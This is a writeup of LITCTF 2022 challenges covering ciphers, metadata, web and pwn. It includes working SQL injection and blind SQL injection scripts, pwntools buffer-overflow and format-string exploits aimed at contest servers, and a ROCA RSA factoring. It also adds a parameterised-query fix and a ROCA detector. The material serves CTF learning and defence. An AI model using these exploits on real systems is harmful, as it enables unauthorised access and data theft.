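This CTF ran from 2022/7/23 0:00 (JST) to 2022/7/25 13:00 (JST).
I took part with a team again this time. We scored 3878 points and placed 39th out of 544 teams.
Below are writeups for the challenges I solved myself.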
HelloWorld (misc)
Caesar cipher. Decrypt it with https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipher.
Rotation 13: LITCTF{W3lc0m3_T0_L1TCTF}
LITCTF{W3lc0m3_T0_L1TCTF}
Hex to ASCII (misc)
Hex-decode it.
$ echo 4c49544354467b74306f6c355f346e645f77336273317433735f6172335f763372795f696d70307274346e745f6630725f4354467d | xxd -r -p
LITCTF{t0ol5_4nd_w3bs1t3s_ar3_v3ry_imp0rt4nt_f0r_CTF}
LITCTF{t0ol5_4nd_w3bs1t3s_ar3_v3ry_imp0rt4nt_f0r_CTF}
PeanutButter.jar (misc)
The flag was written on the PeanutButter.jar team's page on ctftime.
LITCTF{H4s_Th3ir_0wn_CTF_OTZ_OTZ_OTZ}
Personal Website (web)
Scrolling never reaches the bottom of the page. Looking at the HTML source, I found the beginning of the flag.
<p>HAHAHAHAHAHAHAHAHAHA I know you will never reach the bottom here because of my infinite scroll. If you somehow did, here is the first third of the half LITCTF{E5th3r_M4n</p>
The linked http://litctf.live:31777/style.css contains the middle part of the flag.
/* _i5_s0_OTZ_0TZ_OFZ_4t_ */
The linked http://litctf.live:31777/javascript.js contains the end of the flag.
// 3v3ryth1ng_sh3_d03s}
LITCTF{E5th3r_M4n_i5_s0_OTZ_0TZ_OFZ_4t_3v3ryth1ng_sh3_d03s}
CodeTiger orz Is Meta (misc)
$ exiftool codetigerfanpic.png
ExifTool Version Number         : 11.88
File Name                       : codetigerfanpic.png
Directory                       : .
File Size                       : 27 kB
File Modification Date/Time     : 2022:07:23 06:36:34+09:00
File Access Date/Time           : 2022:07:23 06:39:26+09:00
File Inode Change Date/Time     : 2022:07:23 06:36:34+09:00
File Permissions                : rwxrwxrwx
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 1536
Image Height                    : 864
Bit Depth                       : 8
Color Type                      : RGB
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
SRGB Rendering                  : Perceptual
Gamma                           : 2.2
Pixels Per Unit X               : 4724
Pixels Per Unit Y               : 4724
Pixel Units                     : meters
Coded Character Set             : UTF8
Envelope Record Version         : 4
Object Name                     : LITCTF{c0de_
Copyright Notice                : orz}
Caption-Abstract                : t1g2r_
Application Record Version      : 4
XMP Toolkit                     : Image::ExifTool 12.36
Description                     : t1g2r_
Rights                          : orz}
Title                           : LITCTF{c0de_
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : t1g2r_
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Y Cb Cr Positioning             : Centered
Copyright                       : orz}
Image Size                      : 1536x864
Megapixels                      : 1.3
Concatenate the flag fragments in Object Name, Caption-Abstract, and Copyright Notice.
LITCTF{c0de_t1g2r_orz}
Discord Flag (misc)
After joining the Discord and looking at the messages in the #announcements channel, I found the flag written there.
LITCTF{L1T_1S_G0NNA_BE_S0_LIT_W1TH_Y0U_GUYS!}
Kevin's Cookies (web)
The likeCookie cookie is set to false; setting it to true and reloading gives the following message.
Oh silly you. What do you mean you like a true cookie? I have 20 cookies numbered from 1 to 20, and all of them are made from super true authentic recipes.
Setting likeCookie to each value from 1 upward, the flag was displayed at 17.
LITCTF{Bd1mens10n_15_l1k3_sup3r_dup3r_0rzzzz}
Running Up That Hill (crypto)
Hill cipher. Decrypt it with https://www.dcode.fr/hill-cipher.
LITCTF{B3_RUNN1NG_UP_TH4T_H1LLLL}
math test (rev)
Decompile it with Ghidra.
void main(void)

{
  int local_c;
  
  puts("Welcome to the math test. If you get a perfect score, I will print the flag!");
  puts("All questions will have non-negative integer answers.\n");
  for (local_c = 0; local_c < NUM_Q; local_c = local_c + 1) {
    printf("Question #%d: ",(ulong)(local_c + 1));
    puts(*(char **)(questions + (long)local_c * 8));
    __isoc99_scanf(&DAT_00102286);
  }
  grade_test();
  return;
}

void grade_test(void)

{
  int local_10;
  uint local_c;
  
  local_c = 0;
  for (local_10 = 0; local_10 < NUM_Q; local_10 = local_10 + 1) {
    if (*(long *)(submitted + (long)local_10 * 8) == *(long *)(answers + (long)local_10 * 8)) {
      local_c = local_c + 1;
    }
  }
  printf("You got %d out of 10 right!\n",(ulong)local_c);
  if (local_c == 10) {
    puts("Wow! That\'s a perfect score!");
    puts("Here\'s the flag:");
    generate_flag();
  }
  else {
    puts("If you get a 10 out of 10, I will give you the flag!");
  }
  return;
}

void generate_flag(void)

{
  int local_14;
  int local_10;
  int local_c;
  
  for (local_c = 0; local_c < NUM_Q; local_c = local_c + 1) {
    for (local_10 = 0; local_10 < FLAG_LEN; local_10 = local_10 + 1) {
      *(ulong *)(flag + (long)local_10 * 8) =
           *(ulong *)(flag + (long)local_10 * 8) ^
           ((long)local_10 ^ 0xbf58476d1ce4e5b9U) *
           (*(ulong *)(submitted + (long)local_c * 8) ^ 0x94d049bb133111eb);
    }
  }
  for (local_14 = 0; local_14 < FLAG_LEN; local_14 = local_14 + 1) {
    printf("%c",*(undefined8 *)(flag + (long)local_14 * 8));
  }
  putchar(10);
  return;
}

                     answers                 XREF[3]:     Entry Point(*), grade_test:00101307(*), grade_test:0010130e(R)
        00104080 02 00 00        undefine
                 00 00 00
                 00 00 04
           00104080 02    undefined1 02h    [0]     XREF[3]:     Entry Point(*), grade_test:00101307(*), grade_test:0010130e(R)
           00104081 00    undefined1 00h    [1]
           00104082 00    undefined1 00h    [2]
           00104083 00    undefined1 00h    [3]
           00104084 00    undefined1 00h    [4]
           00104085 00    undefined1 00h    [5]
           00104086 00    undefined1 00h    [6]
           00104087 00    undefined1 00h    [7]
           00104088 04    undefined1 04h    [8]
           00104089 00    undefined1 00h    [9]
           0010408a 00    undefined1 00h    [10]
           0010408b 00    undefined1 00h    [11]
           0010408c 00    undefined1 00h    [12]
           0010408d 00    undefined1 00h    [13]
           0010408e 00    undefined1 00h    [14]
           0010408f 00    undefined1 00h    [15]
           00104090 f0    undefined1 F0h    [16]
           00104091 00    undefined1 00h    [17]
           00104092 00    undefined1 00h    [18]
           00104093 00    undefined1 00h    [19]
           00104094 00    undefined1 00h    [20]
           00104095 00    undefined1 00h    [21]
           00104096 00    undefined1 00h    [22]
           00104097 00    undefined1 00h    [23]
           00104098 03    undefined1 03h    [24]
           00104099 00    undefined1 00h    [25]
           0010409a 00    undefined1 00h    [26]
           0010409b 00    undefined1 00h    [27]
           0010409c 00    undefined1 00h    [28]
           0010409d 00    undefined1 00h    [29]
           0010409e 00    undefined1 00h    [30]
           0010409f 00    undefined1 00h    [31]
           001040a0 6d    undefined1 6Dh    [32]
           001040a1 8d    undefined1 8Dh    [33]
           001040a2 de    undefined1 DEh    [34]
           001040a3 09    undefined1 09h    [35]
           001040a4 00    undefined1 00h    [36]
           001040a5 00    undefined1 00h    [37]
           001040a6 00    undefined1 00h    [38]
           001040a7 00    undefined1 00h    [39]
           001040a8 0a    undefined1 0Ah    [40]
           001040a9 00    undefined1 00h    [41]
           001040aa 00    undefined1 00h    [42]
           001040ab 00    undefined1 00h    [43]
           001040ac 00    undefined1 00h    [44]
           001040ad 00    undefined1 00h    [45]
           001040ae 00    undefined1 00h    [46]
           001040af 00    undefined1 00h    [47]
           001040b0 87    undefined1 87h    [48]
           001040b1 15    undefined1 15h    [49]
           001040b2 59    undefined1 59h    [50]
           001040b3 00    undefined1 00h    [51]
           001040b4 00    undefined1 00h    [52]
           001040b5 00    undefined1 00h    [53]
           001040b6 00    undefined1 00h    [54]
           001040b7 00    undefined1 00h    [55]
           001040b8 49    undefined1 49h    [56]
           001040b9 1e    undefined1 1Eh    [57]
           001040ba a1    undefined1 A1h    [58]
           001040bb 06    undefined1 06h    [59]
           001040bc 00    undefined1 00h    [60]
           001040bd 00    undefined1 00h    [61]
           001040be 00    undefined1 00h    [62]
           001040bf 00    undefined1 00h    [63]
           001040c0 5f    undefined1 5Fh    [64]
           001040c1 e9    undefined1 E9h    [65]
           001040c2 60    undefined1 60h    [66]
           001040c3 20    undefined1 20h    [67]
           001040c4 00    undefined1 00h    [68]
           001040c5 00    undefined1 00h    [69]
           001040c6 00    undefined1 00h    [70]
           001040c7 00    undefined1 00h    [71]
           001040c8 09    undefined1 09h    [72]
           001040c9 00    undefined1 00h    [73]
           001040ca 00    undefined1 00h    [74]
           001040cb 00    undefined1 00h    [75]
           001040cc 00    undefined1 00h    [76]
           001040cd 00    undefined1 00h    [77]
           001040ce 00    undefined1 00h    [78]
           001040cf 00    undefined1 00h    [79]
The correct answers are stored in the answers array, as 8-byte little-endian values.
Q1: 2 (=0x0000000000000002)
Q2: 4 (=0x0000000000000004)
Q3: 240 (=0x00000000000000f0)
Q4: 3 (=0x0000000000000003)
Q5: 165580141 (=0x0000000009de8d6d)
Q6: 10 (=0x000000000000000a)
Q7: 5838215 (=0x0000000000591587)
Q8: 111222345 (=0x0000000006a11e49)
Q9: 543222111 (=0x000000002060e95f)
Q10: 9 (=0x0000000000000009)
Enter these answers in order.
$ ./math
Welcome to the math test. If you get a perfect score, I will print the flag!
All questions will have non-negative integer answers.

Question #1: What is 1+1?
2
Question #2: How many sides does a square have?
4
Question #3: What is 8*30?
240
Question #4: What is the remainder when 39 is divided by 4?
3
Question #5: What is the 41st fibbonaci number?
165580141
Question #6: How many questions are on this test?
10
Question #7: What number am I thinking of?
5838215
Question #8: What is the answer to this question?
111222345
Question #9: Prove that the answer to the previous question is correct.
543222111
Question #10: Give me an integer.
9
You got 10 out of 10 right!
Wow! That's a perfect score!
Here's the flag:
LITCTF{y0u_must_b3_gr8_@_m4th_i_th0ught_th4t_t3st_was_imp0ss1bl3!}
LITCTF{y0u_must_b3_gr8_@_m4th_i_th0ught_th4t_t3st_was_imp0ss1bl3!}
Guess The Pokemon (web)
SQL injection. Entering the following and clicking Submit displayed the flag.
1 or 1=1 -- -
LITCTF{flagr3l4t3dt0pok3m0n0rsom3th1ng1dk}
save_tyger (pwn)
$ file save_tyger
save_tyger: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=5bfe49d59c6568478849959669340ec6dc7dbd7d, for GNU/Linux 3.2.0, not stripped
Use a buffer overflow to overwrite pass with 0xabadaaab.
#!/usr/bin/env python3
from pwn import *

# No argument: connect to the remote service; any argument: run the local binary
if len(sys.argv) == 1:
    p = remote('litctf.live', 31786)
else:
    p = process('./save_tyger')

# 40 bytes of padding, then the value that overwrites pass
payload = b'A' * 40
payload += p64(0xabadaaab)

data = p.recvuntil(b'\n').rstrip().decode()
print(data)
data = p.recvuntil(b'\n').rstrip().decode()
print(data)
print(payload)
p.sendline(payload)
data = p.recvuntil(b'\n').rstrip().decode()
print(data)
data = p.recvuntil(b'\n').rstrip().decode()
print(data)
The output is as follows.
[+] Opening connection to litctf.live on port 31786: Done
Oh no, someone stole our one and only Tyger! :noo:
Would you help us save him?
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xab\xaa\xad\xab\x00\x00\x00\x00'
It worked!
LITCTF{y4yy_y0u_sav3d_0ur_m41n_or94n1z3r}
[*] Closed connection to litctf.live port 31786
LITCTF{y4yy_y0u_sav3d_0ur_m41n_or94n1z3r}
save_tyger2 (pwn)
$ file save_tyger2
save_tyger2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=de3f886845dafa4aba9055e73a689bb63def6740, for GNU/Linux 3.2.0, not stripped
Use a buffer overflow to call the cell function.
#!/usr/bin/env python3
from pwn import *

# No argument: connect to the remote service; any argument: run the local binary
if len(sys.argv) == 1:
    p = remote('litctf.live', 31788)
else:
    p = process('./save_tyger2')

# The binary is not PIE, so the address of cell is fixed
elf = ELF('./save_tyger2')
cell_addr = elf.symbols['cell']

# 40 bytes of padding, then the address of cell as the return address
payload = b'A' * 40
payload += p64(cell_addr)

data = p.recvuntil(b'\n').rstrip().decode()
print(data)
data = p.recvuntil(b'\n').rstrip().decode()
print(data)
print(payload)
p.sendline(payload)
data = p.recvuntil(b'\n').rstrip().decode()
print(data)
data = p.recvuntil(b'\n').rstrip().decode()
print(data)
The output is as follows.
[+] Opening connection to litctf.live on port 31788: Done
[*] '/mnt/hgfs/Shared/save_tyger2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
NOOOO, THEY TOOK HIM AGAIN!
Please help us get him out or there is no way we will be able to prepare LIT :sadness:
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAb\x11@\x00\x00\x00\x00\x00'
Thank god you got him out of this cockroach-infested cell!
LITCTF{w3_w0nt_l3t_th3m_t4k3_tyg3r_3v3r_4gain}
[*] Closed connection to litctf.live port 31788
LITCTF{w3_w0nt_l3t_th3m_t4k3_tyg3r_3v3r_4gain}
Among Us (web)
Nothing resembling a flag turns up in the site's pages or the files they link to. Look at the response headers for the given URL.
$ curl http://litctf.live:31779/ --dump-header - -o /dev/null
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0HTTP/1.1 200 OK
x-powered-by: Express
accept-ranges: bytes
cache-control: public, max-age=0
last-modified: Mon, 18 Jul 2022 01:42:49 GMT
etag: W/"10d2-1820ef8e905"
content-type: text/html; charset=UTF-8
content-length: 4306
date: Sat, 23 Jul 2022 05:15:29 GMT
keep-alive: timeout=5

100  4306  100  4306    0     0  11155      0 --:--:-- --:--:-- --:--:-- 11155
Look at the response headers for the linked page.
$ curl http://litctf.live:31779/sussy-yellow-amogus --dump-header - -o /dev/null
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0HTTP/1.1 200 OK
x-powered-by: Express
sussyflag: LITCTF{mr_r4y_h4n_m4y_b3_su55y_bu7_4t_l3ast_h3s_OTZOTZOTZ}
accept-ranges: bytes
cache-control: public, max-age=0
last-modified: Mon, 18 Jul 2022 01:43:01 GMT
etag: W/"4d917-1820ef91815"
content-type: image/gif
content-length: 317719
date: Sat, 23 Jul 2022 05:17:32 GMT
keep-alive: timeout=5

100  310k  100  310k    0     0   197k      0  0:00:01  0:00:01 --:--:--  197k
The flag was set in the sussyflag response header.
LITCTF{mr_r4y_h4n_m4y_b3_su55y_bu7_4t_l3ast_h3s_OTZOTZOTZ}
waifu (pwn)
$ file waifu
waifu: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2b8d0e98c1a7ea5c95005bc6804f6d1ed7656a9c, for GNU/Linux 3.2.0, not stripped
Use a format string bug to leak the flag from memory.
#!/usr/bin/env python3
from pwn import *

flag = ''
i = 6
while True:
    # One connection per leaked 8-byte word
    if len(sys.argv) == 1:
        p = remote('litctf.live', 31791)
    else:
        p = process('./waifu')

    # Print the i-th argument slot as a pointer
    payload = f'%{i}$p'
    data = p.recvuntil(b'\n').rstrip().decode()
    print(data)
    print(payload)
    p.sendline(payload.encode())
    data = p.recvuntil(b':\n').rstrip().decode()
    print(data)
    data = p.recvuntil(b'\n').rstrip().decode()
    print(data)
    # The leaked value is a little-endian chunk of the flag
    flag += p64(int(data, 16)).decode()
    if '}' in flag:
        break
    p.close()
    i += 1

print(flag)
The output is as follows.
[+] Opening connection to litctf.live on port 31791: Done
Do you like waifus?
%6$p
Wtmoo how could you say:
0x667b46544354494c
[*] Closed connection to litctf.live port 31791
[+] Opening connection to litctf.live on port 31791: Done
Do you like waifus?
%7$p
Wtmoo how could you say:
0x747833745f6d3072
[*] Closed connection to litctf.live port 31791
[+] Opening connection to litctf.live on port 31791: Done
Do you like waifus?
%8$p
Wtmoo how could you say:
0x755f68732e377234
[*] Closed connection to litctf.live port 31791
[+] Opening connection to litctf.live on port 31791: Done
Do you like waifus?
%9$p
Wtmoo how could you say:
0x6161616161616177
[*] Closed connection to litctf.live port 31791
[+] Opening connection to litctf.live on port 31791: Done
Do you like waifus?
%10$p
Wtmoo how could you say:
0x7d61616161616161
LITCTF{fr0m_t3xt4r7.sh_uwaaaaaaaaaaaaaa}
[*] Closed connection to litctf.live port 31791
LITCTF{fr0m_t3xt4r7.sh_uwaaaaaaaaaaaaaa}
Amy The Hedgehog (web)
Check whether SQL injection is possible.
a
→wrong!!! (。•̀ᴗ-)✧
' union select 1 --
→(≧U≦❁) You got it!!!
' union select name from names --
→(≧U≦❁) You got it!!!
' or 1=1 --
→(≧U≦❁) You got it!!!
Recover the flag with blind SQL injection.
#!/usr/bin/env python3
import requests

url = 'http://litctf.live:31770/'

# Find the length of the value first
flag_len = -1
for i in range(1, 33):
    data = {"name": "' or (SELECT length(name) FROM names) = " + str(i) + " --"}
    r = requests.post(url, data=data)
    if 'You got it!!!' in r.text:
        flag_len = i
        break

print('[+] Flag Length is:', flag_len)

# Then recover it one character at a time from the yes/no response
flag = ''
for i in range(1, flag_len + 1):
    for code in range(33, 127):
        data = {"name": "' or substr((SELECT name FROM names)," + str(i) + ",1)" + " = '" + chr(code) + "' --"}
        r = requests.post(url, data=data)
        if 'You got it!!!' in r.text:
            flag += chr(code)
            break
    print('[+] flag:', flag)

print('[*] flag:', flag)
The output is as follows.
[+] Flag Length is: 13
[+] flag: L
[+] flag: LI
[+] flag: LIT
[+] flag: LITC
[+] flag: LITCT
[+] flag: LITCTF
[+] flag: LITCTF{
[+] flag: LITCTF{s
[+] flag: LITCTF{sl
[+] flag: LITCTF{sld
[+] flag: LITCTF{sldj
[+] flag: LITCTF{sldjf
[+] flag: LITCTF{sldjf}
[*] flag: LITCTF{sldjf}
LITCTF{sldjf}
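The root cause behind both this challenge and Guess The Pokemon, as an added example that is not part of the original writeup or the challenge source: the same lookups written with string concatenation and with bound parameters, run against an in-memory SQLite database. The query shapes, function names, the pokemon table and the stored values are assumptions; only names.name and the inputs come from the post.

```python
import sqlite3

def make_db():
    # Constructed stand-in data; only the table/column `names.name` comes
    # from the payloads in the post. The `pokemon` table is hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE names (name TEXT)")
    db.execute("INSERT INTO names VALUES ('SECRET{demo}')")
    db.execute("CREATE TABLE pokemon (id INTEGER, name TEXT)")
    db.executemany("INSERT INTO pokemon VALUES (?, ?)",
                   [(1, "bulbasaur"), (2, "ivysaur")])
    return db

def name_exists_vulnerable(db, name):
    # Assumed server pattern: input concatenated into a quoted literal.
    sql = "SELECT name FROM names WHERE name = '" + name + "'"
    return db.execute(sql).fetchone() is not None

def name_exists_safe(db, name):
    # Bound parameter: the input is compared as data, never parsed as SQL.
    sql = "SELECT name FROM names WHERE name = ?"
    return db.execute(sql, (name,)).fetchone() is not None

def pokemon_by_id_vulnerable(db, raw_id):
    # Numeric context: no quote is needed to change the query's logic.
    sql = "SELECT name FROM pokemon WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def pokemon_by_id_safe(db, raw_id):
    # Reject anything that is not an integer, then bind it.
    try:
        value = int(raw_id)
    except ValueError:
        return []
    sql = "SELECT name FROM pokemon WHERE id = ?"
    return db.execute(sql, (value,)).fetchall()

# Inputs quoted in the post, plus one length probe in the post's format.
PROBES = ["' union select 1 --", "' union select name from names --",
          "' or 1=1 --", "' or (SELECT length(name) FROM names) = 12 --"]

def oracle(check):
    """Return the yes/no answer the page would give for each probe."""
    db = make_db()
    return [check(db, probe) for probe in PROBES]

if __name__ == "__main__":
    print("concatenated: ", oracle(name_exists_vulnerable))
    print("parameterized:", oracle(name_exists_safe))
    print(pokemon_by_id_vulnerable(make_db(), "1 or 1=1 -- -"))
    print(pokemon_by_id_safe(make_db(), "1 or 1=1 -- -"))
```

With bound parameters every probe returns the same "no", so the response no longer answers questions about the table's contents.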
EYANGCH Fan Art Maker (web)
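Submitting some arbitrary input leaves the flag mostly hidden behind the marker strokes. Render the flag a second time, separately from the default flag display, at an adjusted position.
For example, the following input makes the flag visible.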
<flag x="200" y="550"></flag>
LITCTF{wh4t_d03s_CH_1n_EyangCH_m3an???}
A ROCk (crypto)
A ROCA challenge. Factor N with neca.
$ ./neca 8721839759350069167278335804233522732628197837843780295129915563071581371083672792796544014245271677069445637593635290140076123157617389715458979685368727
NECA - Not Even Coppersmith's Attack
ROCA weak RSA key attack by Jannis Harder (me@jix.one)
 *** Currently only 512-bit keys are supported ***
N = 8721839759350069167278335804233522732628197837843780295129915563071581371083672792796544014245271677069445637593635290140076123157617389715458979685368727
Factoring...
 [==========              ] 43.32% elapsed: 1000s left: 1308.58s total: 2308.64
 [==========              ] 43.36% elapsed: 1001s left: 1307.57s total: 2308.63
 [==========              ] 43.41% elapsed: 1002s left: 1306.55s total: 2308.61
 [==========              ] 43.45% elapsed: 1003s left: 1305.54s total: 2308.61
 [==========              ] 43.49% elapsed: 1004s left: 1304.67s total: 2308.69
        :
 [==============          ] 56.50% elapsed: 1303s left: 1003.19s total: 2306.19
 [==============          ] 56.55% elapsed: 1304s left: 1002.09s total: 2306.17
 [==============          ] 56.59% elapsed: 1305s left: 1001.09s total: 2306.17
 [==============          ] 56.63% elapsed: 1306s left: 1000.17s total: 2306.19
 [==============          ] 57.07% elapsed: 1316s left: 990.10s total: 2306.10s
Factorization found:
N = 70672758723177433011581077796363544664410141195648490771860623139983928782297 * 123411621633636675541493070644959834875873057348494554188657868973313372350191
With the factorization in hand, decrypt as usual.
#!/usr/bin/env python3
from Crypto.Util.number import *

# nums.txt holds n, e and ct, one "name=value" per line
with open('nums.txt', 'r') as f:
    params = f.read().splitlines()

n = int(params[0].split('=')[1])
e = int(params[1].split('=')[1])
ct = int(params[2].split('=')[1])

# Factors found by neca
p = 70672758723177433011581077796363544664410141195648490771860623139983928782297
q = 123411621633636675541493070644959834875873057348494554188657868973313372350191
assert p * q == n

phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(ct, d, n)
flag = long_to_bytes(m).decode()
print(flag)
LITCTF{rsalib_n0_m0r333}
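The detection side of this weakness, as an added example (not code from the original writeup or from neca): a check for the ROCA fingerprint that flags a modulus without factoring it. The function names and the 39-prime setting (the ROCA paper's parameter for 512-bit moduli) are assumptions of this example; N, P and Q are the values from the post, and NON_ROCA is a constructed comparison modulus.

```python
# Values from the post (neca input and the factors it printed).
N = 8721839759350069167278335804233522732628197837843780295129915563071581371083672792796544014245271677069445637593635290140076123157617389715458979685368727
P = 70672758723177433011581077796363544664410141195648490771860623139983928782297
Q = 123411621633636675541493070644959834875873057348494554188657868973313372350191
# Constructed comparison modulus: product of two Mersenne primes.
NON_ROCA = (2**61 - 1) * (2**89 - 1)

GENERATOR = 65537

def first_primes(count):
    """Return the first `count` primes by trial division (count is small)."""
    primes = []
    candidate = 2
    while len(primes) < count:
        if all(candidate % p for p in primes):
            primes.append(candidate)
        candidate += 1
    return primes

def subgroup(generator, modulus):
    """Return every residue generator^k mod modulus."""
    seen, x = set(), 1
    while x not in seen:
        seen.add(x)
        x = x * generator % modulus
    return seen

def failing_primes(n, prime_count=39):
    """Small primes r for which n mod r is NOT a power of 65537 mod r.

    ROCA-generated primes have the form k*M + (65537^a mod M), where M is
    the product of the first `prime_count` primes, so n = p*q is itself a
    power of 65537 modulo every prime r dividing M.
    """
    return [r for r in first_primes(prime_count)
            if n % r not in subgroup(GENERATOR % r, r)]

def has_roca_fingerprint(n, prime_count=39):
    # An empty failure list means the key should be treated as weak and
    # replaced; a random modulus passes every test only by rare chance.
    return not failing_primes(n, prime_count)

if __name__ == "__main__":
    for label, value in [("N", N), ("P", P), ("Q", Q), ("NON_ROCA", NON_ROCA)]:
        print(label, has_roca_fingerprint(value), failing_primes(value)[:3])
```

The check only needs the public modulus, so it can be run over certificates or key inventories to find keys that must be regenerated.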
Flashy Colors (crypto)
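Reading down the image column by column, map each R, G and B value to 1 when it is 255 and to 0 when it is 0, line the bits up as a binary number, and decode it.
#!/usr/bin/env python3
from PIL import Image
from Crypto.Util.number import *

img = Image.open('FlashyColors.png').convert('RGB')
w, h = img.size

# Sample one pixel per 240x240 block, column by column
bin_data = ''
for x in range(0, w, 240):
    for y in range(0, h, 240):
        r, g, b = img.getpixel((x, y))
        # 255 -> 1, 0 -> 0 for each channel
        bin_data += str(r & 1) + str(g & 1) + str(b & 1)

flag = long_to_bytes(int(bin_data, 2)).decode()
print(flag)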
LITCTF{0MG_I_l0ve_th3s3_fla5hy_c0lor}
Survey (misc)
The flag was displayed after answering the survey.
LITCTF{Th4nk5_for_c0m1ng_w3_l0v3_y0u}